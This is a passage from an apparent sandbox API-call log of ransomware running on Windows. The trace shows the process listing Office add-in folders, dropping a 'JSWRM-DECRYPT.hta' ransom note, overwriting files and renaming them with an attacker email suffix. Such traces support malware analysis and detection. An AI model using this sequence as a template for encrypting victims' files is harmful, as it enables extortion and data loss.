ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf458770a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45d3b76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf8502274, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf8502274, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a04f26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b3aadd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b3aadd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47ac0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ac3a61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d50bdc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d50bdc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d50bdc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37d2e47, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37d2e47, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x91f9f99, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x91f9f99, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72070, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4692737, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4692737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaad8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a13a8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68b32cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68b32cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68b32cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ad0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.565] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.566] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0126.566] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0126.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\jswrm-decrypt.hta")) returned 0xffffffff [0126.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.567] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.568] CloseHandle (hObject=0x314) returned 1 [0126.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\jswrm-decrypt.hta")) returned 0x20 [0126.568] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x421a261f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0126.568] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x421a261f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.569] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x421a261f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x421a261f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x421a261f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.569] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16783027, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1135, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.569] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4405) returned 1 [0126.569] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.569] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1130, lpOverlapped=0x0) returned 1 [0126.576] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.576] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1130, lpOverlapped=0x0) returned 1 [0126.576] CloseHandle (hObject=0x338) returned 1 [0126.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\gl\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\gl\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.577] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xca90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf05741b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf05741b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbce360e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbce360e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbce360e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fea98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf18f9628, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ca98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4d20ecd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4d20ecd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x443f20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x443f20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47ad8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3a5b63a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3a5b63a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3aa7b04, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5488, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x68ff786, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19af0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbe3ab3a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbe3ab3a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbe3ab3a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x71078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4d20ecd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4d20ecd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15080, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfe368d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfe368d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23428c3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23428c3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23428c3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a77594, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a77594, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a77594, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a77594, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a77594, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a77594, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.578] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0126.578] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0126.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel 